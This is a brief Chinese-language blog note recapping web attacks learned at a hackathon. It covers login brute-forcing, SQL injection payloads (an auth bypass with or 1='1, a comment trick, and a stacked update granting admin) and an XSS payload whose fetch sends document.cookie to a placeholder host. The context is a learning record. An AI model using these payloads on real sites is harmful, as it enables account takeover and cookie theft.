Hackathon
整理下Hackathlon遇到(学到)的东西。这样的比赛还是挺好玩的。做出来一些。
image.png破解用户登录的方式,可以通过一段程序来模拟用户登录。猜测用户的密码。当然现在大部分网站登录都做了防暴力破解,比如加验证码,加图片数字识别,也有密码输错几次后,直接锁定等操作。
针对没有防止sql注入的网站,我们可以猜测它的sql。核心就是通过加入特殊字符使其sql语句“失效”。例如: select * from users where username='?' and password = '?';
那么当我们知道用户名的时候,可以在password那个表单里面填写:
any' or 1='1
这样完整的sql就变成了 select * from users where username='admin' and password='any' or 1='1';这样就绕过了验证或者可以将他的数据拿到。当然还可以在用户名的表单里面输入 admin' //,加入两个//,这样会使得密码表单无论输入什么都是有效地。
还可以在密码表单里面增加更新sql。
any'; update users set type='admin' where name='xxx
有些网站为了方便debug,会在系统里开backdoor。当我们试验多次的时候,仔细分析它的返回值或者reponse,会得到一些信息。这样方便我们利用它来进一步做些操作。
以前还经常听到流量劫持。我们也可以通过页面上放置一个不存在资源,然后当页面加载的时候,将页面上存储的cookie放送到指定的位置。
X<img src='X' onerror=alert(document.cookie)> 或者fetch("http://xxx.com?p=document.cookie")